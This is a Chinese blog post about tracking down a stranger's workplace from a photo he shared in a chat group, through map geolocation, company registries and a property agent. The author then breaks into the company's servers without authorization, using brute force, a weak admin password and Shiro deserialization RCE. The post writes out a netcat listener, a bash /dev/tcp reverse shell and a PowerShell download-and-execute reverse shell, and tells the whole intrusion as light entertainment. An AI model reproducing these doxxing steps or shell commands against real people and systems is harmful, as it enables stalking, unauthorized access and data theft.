专栏首页释然IT杂谈一张随拍引起的安全思考

一张随拍引起的安全思考

起因

国庆的某一天,在一个我的小伙伴把我拉进去的小型的QQ群里,一个我不认识的兄弟发了一张图片,然后吐槽自己国庆正在加班。正好国庆值班的我闲着也是闲着,于是给自己找点事情做,就和这位兄弟简单聊了一下,不禁感到“同是天涯加班人,相聊何必曾相识”。然后就想试试看能不能把他的信息找出来,接下来就开始了一段社工加渗透的旅程。

经过

首先,就只有这一张图,清晰度也是被QQ压缩过的。但是放大之后勉强可以看清一些东西,比如:

放大之后就这样,大家是不是完全认不出来写的是啥啊?哈哈哈,那是因为我打了码。

未打码之前,其实我也只能看清后面四个字,最后两个是双语,第二三个字,也能勉强认出来,但是就不透露了。第一个字是完全认不出来。。但是还有一个重点,即使认不出字,大家也肯定能发现这五个字颜色不一样吧,也就是彩色的牌子,再结合之前最后两个字双语,再结合一点生活经验。好,想必大家应该都知道了。没错,这就是一个xxx双语幼儿园!

好了,直接百度,知道两个字了,第一个字知不知道其实影响不大。

好,因为我目前是在深圳,因此百度直接弹出了这个界面。这给了我两个关键信息。1:如果幼儿园前面那两个字我没认错的话,首先排除深圳。2,既然提到地点了,我可以缩小范围,加上他所在的地区啊。于是赶紧登了QQ,然后点开信息查询。

哈哈哈,北京顺义,我正以为马上就能找到正确的答案了。结果给我当头一棒,北京也没有,我都怀疑起我语文是不是体育老师教的了,难道我那两个字认错了不成?

然后我静下来一想,他是我朋友的大学同学,都是在武汉上的大学,所以按常理,他很大概率是在武汉上班。于是,抱着试试的想法,在前面加了武汉两个字。

好家伙,你一个在武汉上学工作的兄弟,个人信息里却写个北京。不由得感叹,现在的年轻人啊,一个个轻佻浮躁,连地址都不好好写,害得我一顿找。但是转念一想,万一人家真的是住在北京,有户口的那种,顿时心里一酸,流下羡慕的泪水。。

现在已经找到了照片中的这个幼儿园,那么找到这个拍摄者的大概位置应该并不难。首先先点开地图,看一下周围环境。

发现扇形的公园和幼儿园的位置十分对应,然后可以看到附近的楼房位置也和地图上的几乎一样。这下更加确定了目标的地址,确实就是地图上搜索到的位置。接下里就可以放心的打开实景地图进行搜寻了。首先我们点击了幼儿园的位置,进入到了实景模式。

通过地图很容易知道,接下来该往南走了,中间的路途就不放了,直接到我们的目的地。

没错,已经可以确定就是这栋写字楼了。而这正好也是类似与软件园那样的办公场所,应该很多公司共用一栋楼,分别租的不同的楼层用于办公。而且,从拍摄者的角度初步判断,应该属于8层以上的高层。并且,通过一些照片的细节判断,应该是在右边第一列。

目前从这张照片所能获取的信息就这么多了。然后,知道了这栋楼的栋数为2A栋,知道了这个软件园的名字。接下来就是到天眼查上逛一逛了。输入了具体的地址后,蹦出来了一堆公司,简单看了下,2A栋8层以上的公司也不算少。

这里又引入了新的问题,那就是这个位置是几号或者几室,这个问题由我们目前所掌握的信息是无法解决的。就在我一筹莫展的时候,点击了下这个地址,然后突然跳到了以下界面,卧槽,这不正是山重水复疑无路,得来全不费工夫吗???

于是随便点击进去了一个, 找到了中介的联系方式,加微信!然后直奔主题。

OK,这下就把范围缩的很小很小了。然后看看有哪些公司吧,最后整理了下发现有两家公司可能性最大,分别是12层3号和15层3号。然后一家是房屋建筑业,还有一家是软件和信息技术服务业。。然后我问了下我的同学,得知他大学专业为软件工程。。。哦豁,不用想了吧。已经百分之99确定了那个兄弟的公司了。

然后点击进去,发现公司介绍里面有个网站,简单看了下,找到了一个登录界面,第一时间想到了弱口令,爆破,注入等基本操作。

话不多说,打开BP直接开干。因为有验证码的存在,直接通过intruder模块来爆破是不行的。这里可以使用一款专门处理这种较简单验证码的工具——PKAV HTTP Fuzzer。用法其实和BP差不多,首先是抓取登录时候的数据包,不过这款软件没有这个功能,还是用BP抓包,之后复制到这里来。跟BP的区别是这里有个添加验证码标记。之后将验证码图片的网络地址复制过来进行识别即可绕过验证码进行爆破了。(图片仅供参考,非实际截图)

但是,数百秒过去了,却一点结果都没有,应该是密码复杂度挺高,感觉可以放弃这条路了。然后手动测试了下,看看有没有逻辑漏洞可以直接以管理员身份登录,多次尝试无果,就只能换其他的路走了。

扫了下目录,没有什么有价值的发现。然后扫了下端口,发现22端口开着,那么明知山没虎,偏向虎山行,果不其然,hydra爆破了下没有任何收获,这条路也堵住了。

然后看到了一个奇怪的端口,8099。。好奇心驱使着我,直接web访问一下看看,是一个登录系统,看上去像是他们员工的登录系统,感觉有点希望。

然后随便抓了下包看看,这下密码是加了密的,老套路走不通了。于是只能试试弱口令了,账号admin,密码111111,123456等等,然后admin123,,登陆成功。。????不是吧阿sir,就进去了??但是还没来得及高兴就给当头一棒。。登陆后发现后台功能十分简单,没有上传点,没有SQL注入,XSS都没有,,,没办法直接获取权限,这可真是日了X了。。。然后无奈只能看看BURP,有没有什么发现,好家伙,不看不知道,一看吓一跳。。

这不是shiro反序列化的rememberme吗。。。然后思考了下,先对登录接口进行shiro反序列化测试,先ping一下dnslog平台看看dnslog是否能接收到数据。

然后发现dnslog平台接收到了数据,开始反弹shell,我们先监听一个端口。

nc -lvvp 1234

接下来制作反弹shell的代码。

bash -i >& /dev/tcp/IP/1234 0>&1直接进行反序列化绕过base64编码。

然后我们使用shiro的exp来进行反弹shell。

然后exp执行完了还是没有收到反弹的shell,能ping通但是反弹不回来shell这个时候我们首先想到两种想法:

1、 反弹的命令不对,有可能是服务器是windows系统,不支持bash反弹;

2、 协议不对,目标服务器限制了出网的协议不能是tcp,这个时候我们可以尝试使用icmp协议反弹shell。

我们先判断一下其他命令能不能执行,通过dnslog外带出来,假如目标服务器是linux系统,我们使用反引号加上whoami然后再拼接到dnslog平台可以将当前用户名带出来,如果带不出来,说明不能执行就很有可能是windows系统。

结果DNSLOG没有带出来数据,然后我们尝试使用ceye平台。

然后ceye收到了请求,外带的数据是root。

这个时候你是不是觉得目标服务器就是linux了,其实不然,因为我们使用反引号时在我们本机执行命令的时候就已经将whoami替换成了root(其实我一开始也觉得是linux系统了,然后我不甘心又执行了一个cat /etc/hostname发现主机名和我的主机名相同,我才感觉不对劲,后来想起来反引号需要转义一下)数据在发送之前就已经被执行了。

然后我们将反引号转义之后再发送,ceye平台没有收到解析记录,说明服务器没有执行我们的whoami命令。之后我们使用powershell反弹shell,首先在本地下载一个脚本,然后在脚本所在的目录下起一个http服务,然后监听2222端口。准备就绪后,开始反弹shell。

`python3 shiro_rce1.py https://xxx/xxx/xx/login "powershell IEX (New-Object Net.WebClient).DownloadString('http://xx.xx.xx.xx/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress xx.xx.xx.xx -port 2222"`

成功反弹shell。

结果

拿到shell了,其实我是想继续深入渗透下,看能不能找到一些那位兄弟的资料。这样可能才有点戏剧性的结果。。但是冷静了下,仔细思考了一会,,这可是未授权渗透啊,再往下继续的话,被发现了后果很严重。。于是赶紧止步于此,然后提交个CNVD事件型的漏洞。之后QQ联系下那位兄弟,跟他简单说下这个情况,让他跟他们领导或者其他懂安全的人反馈下,顺便给他普及了下安全知识。。

你以为这就结束了?不!我反手就是一波推销,建议购买我们360公司的安全设备和安全服务!!!

结语

整个流程还是得从一张普通的随拍说起,无意一张照片,却可以让一个完全陌生的人找到他所在的公司,严重点的话通过漏洞getshell之后甚至可以获取更重要的资料,对公司造成损失。因此,大家要注意在日常生活中的一些不经意的活动中都可能会泄露一些敏感信息,所以我们要培养一定的安全意识。早在1964年,著名的照片泄密案,是《中国画报》封面刊出的一张照片。在这张照片中,铁人王进喜穿着棉袄,下着大雪。,眺望远方。。而日本的情报专家根据这张简单的照片,解开了中国最大的石油基地的秘密。

之后拿到网站之后的操作其实就很基础了。弱口令是一个利用简单危害却很大的漏洞,但是如今仍然十分普遍,这就是安全意识不足导致的。在shiro反序列化的过程中虽然遇到了点小问题,但是也还好,没有遇到太多的挫折就拿到shell了,可能还有其他的漏洞我还没有注意到。当然,我也不能再继续挖掘了,不然再看到这篇文章的时候,可能我就进去了。。

——END——

本文分享自微信公众号 - 释然IT杂谈(gh_ad4551519762)

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-12-01

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 一张页面引起的项目架构思考(rax+Typescript+hooks)

    不过话说来,很多人都认为前端无非就是 HTML+CSS+JS,一个目录一类文件,有何架构可言。但是我想说。。。。你说的都对!

    Nealyang
  • 一道面试题引起的思考

    今天在认真干(划)活(水)的时候,看到群里有人发了一道头条的面试题,就顺便看了一下,发现挺有意思的,就决定分享给大家,并且给出我的解决方案和思考过程。

    嘿嘿嘿
  • delete一张大表引发的一点思考

    今天上班的时候接收到了一个业务方的反馈,说是一个数据库在删除表的时候报错了,我让他截给我日志看看,日志中的内容如下:

    AsiaYe
  • teg 一次云故障引起的思考

    很多朋友经历了昨晚阿里云3小时左右的故障,我司的业务也受到了一定影响,技术的同事一起熬夜奋战,最终观察服务稳定运行了两个多小时,直到凌晨五六点多才逐渐登出VPN...

    葫芦
  • 一张验证码引发对DOS的思考

    他的目的就是为了让攻击目标网站或者在线服务失去相应,或者因为大量流量和IP一时间如洪水般涌入服务器,导致服务器拒绝服务,甚至宕机。

    V站CEO-西顾
  • 弱口令问题引发安全的思考

    分析某病毒样本时候,发现病毒样本实现对主机进行弱口令爆破功能,通过弱口令爆破从而达到获取主机某些权限和登录主机,并进行做对威胁影响主机安全的事情,例如盗取敏感数...

    小道安全
  • 对gitlab安全的一些思考

    http://lee90.blog.51cto.com/10414478/1858636 这篇博客里面,我提到了开发人员在异地git clone导致阿里云报警的...

    二狗不要跑
  • 一个ExoPlayer原生播放问题引起的思考

    我们在使用ExoPlayer播放视频的视频发现一种特殊的M3U8视频,播放总是失败。 而且报如下的错误:

    马上就说
  • 入侵某网站引发的安全防御思考

    作者: 我是小三 博客: http://www.cnblogs.com/2014asm/ 由于时间和水平有限,本文会存在诸多不足,希望得到您的及时反馈与指正,多...

    我是小三
  • 甲方安全建设的一些思路和思考

    本文主要是介绍一下笔者对于甲方安全能力建设的一些经验,心得和零散的思考。需要特别强调的是不同企业的实际情况不尽相同,本文仅供参考,不具普遍意义。

    信安之路
  • 【作者投稿】一道反序列化CTF引起的思考

    刚开始看到这道题目,我是懵逼的。因为整篇代码没有数据输入口,然后怀疑有其它机关,抓包、扫目录无果之后,找到了一篇writeup如下:

    信安之路
  • 普利策奖大师教你:用iPhone拍出好照片

    相机不会随时带在身边,而手机却会。除此以外,爬山的时候本身就已经有很多的负重,手机自然成为了更为轻便的选择。因此,我买了这本书。

    张子阳
  • Pixel 2 XL,软件为王

    在用了六年多 iPhone 后,程序君对 iOS 系统已经深深地审美疲劳,累觉不爱。 新出的 iPhone X 噱头不少,从功能上来看让人大失所望。正好,pix...

    tyrchen
  • 用照片也能追踪手机?人脸识别迎来“终结者”

    就像世界上没有两片相同的雪花,你用手机拍摄的每张照片也是独一无二的。布法罗大学的研究人员掌握了一种方法,可以通过分析照片来追踪拍摄的手机,这项研究为身份验证提供...

    企鹅号小编
  • 乙方安全运营服务的一些思考

    最近因为有项目涉及到安全运营,所以抽时间了解了下。和身边正转行做安全运营的小伙伴也深入的讨论了关于乙方安全运营服务的一些想法,觉得如果能把自己的想法写下来向更多...

    FB客服
  • 太味儿!菊纹、粪便识别测健康,斯坦福智能马桶研究登上Nature子刊

    深度学习三巨头之一、图灵奖获得者 Yann LeCun 看完之后一脸认真地说,「卷积网络正在马桶上落地,为人类谋福祉。」

    机器之心
  • 一道号称“史上最难”的java面试题引发的线程安全思考

    最近偶然间看见一道名为史上最难的java面试题,这个题让了我对线程安全的有了一些新的思考,给大家分享一下这个题吧:

    用户5397975
  • 神经拟态视觉传感器来了!手机和车都能用,李开复雷军纷纷投资

    如果将这一系列图像通过足够快的速度连续展示,人类视觉就能产生“这是连续运动”的错觉。

    量子位
  • 11张网络安全思维导图,快收藏起来强化你的服务器安全吧

    本文包含以下思维导图: ● 网络安全绪论 ● 扫描与防御技术 ● 网络监听及防御技术 ● 口令破解及防御技术 ● 欺骗攻击及防御技术 ● 拒绝服务供给与防御技术...

    小小科

扫码关注云+社区

领取腾讯云代金券